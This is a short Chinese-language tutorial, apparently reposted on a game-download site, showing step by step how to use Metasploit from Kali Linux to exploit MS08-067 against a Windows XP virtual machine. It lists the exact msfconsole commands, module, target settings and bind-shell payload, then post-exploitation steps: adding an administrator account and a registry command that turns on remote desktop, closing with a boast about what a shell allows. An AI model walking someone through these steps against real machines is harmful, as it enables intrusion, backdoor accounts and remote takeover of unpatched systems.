kalilinux攻击漏洞MS08_067

在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境，kalilinux：192.168.116.3 winxp 192.168.116.116 要做的就是用Kali Linux里的Metasploit入侵WinXP

操作方法 01

在Kali用命令 msfconsole 开启Metasploit （在终端里输入msfconsole）

02

然后运行命令： use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻击程序

03

set LHOST 192.168.116.3 #设置本地主机IP

04

set RHOST 192.168.116.116 #设置目标主机IP

05

set payload windows/shell_bind_tcp #设置payload

06

show options#查看设置信息

07

exploit#实施攻击

08

攻击成功，我们得到了一个cmdshell，接下来就是新建账户了。

09

添加用户名为zeal，密码为zeal的用户，并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况

10

发现并没有开启3389（远程桌面连接端口），我们需要手动开启。需要执行命令：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

11

有了目标主机的cmdshell你想做什么不行吧？

12

好了演示到此完毕！

本文地址：网络百科频道 https://www.eeeoo.cn/wangluo/1061212.html，嗨游网一个专业手游免费下载攻略知识分享平台，本站部分内容来自网络分享，不对内容负责，如有涉及到您的权益，请联系我们删除，谢谢！